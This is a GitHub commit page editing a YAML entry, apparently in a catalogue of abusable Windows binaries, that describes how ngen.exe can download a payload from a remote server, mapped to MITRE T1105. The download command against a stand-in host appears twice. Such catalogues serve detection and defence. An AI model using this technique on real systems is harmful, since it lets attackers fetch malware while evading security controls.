Skip to content

Commit

Permalink
Update Ngen.yml
Browse files Browse the repository at this point in the history
  • Loading branch information
wietze authored Jul 15, 2024
1 parent f577261 commit 144a9c8
Showing 1 changed file with 5 additions and 5 deletions.
10 changes: 5 additions & 5 deletions yml/OSBinaries/Ngen.yml
Original file line number Diff line number Diff line change
Expand Up @@ -5,19 +5,19 @@ Author: Avihay Eldad
Created: 2024-02-19
Commands:
- Command: ngen.exe http://example.com/calc.exe
Description: Downloads payload from remote server using Microsoft native image generator utility.
Usecase: Set the payload name as 'calc.exe.config' on the remote server, and it will be downloaded to the cache folder (%LOCALAPPDATA%\Microsoft\Windows\INetCache\IE) as 'calc.exe.xml'.
Description: Downloads payload from remote server using the Microsoft Native Image Generator utility.
Usecase: It will download a remote payload and place it in INetCache.
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows
OperatingSystem: Windows 10, Windows 11
Tags:
- Download: INetCache
Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.xxx\ngen.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.xxx\ngen.exe
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.xxx\ngen.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.xxx\ngen.exe
Code_Sample:
- Code: ngen.exe http://example.com/calc.exe
Acknowledgement:
- Person: Avihay Eldad
Handle: '@AvihayEldad'

0 comments on commit 144a9c8

Please sign in to comment.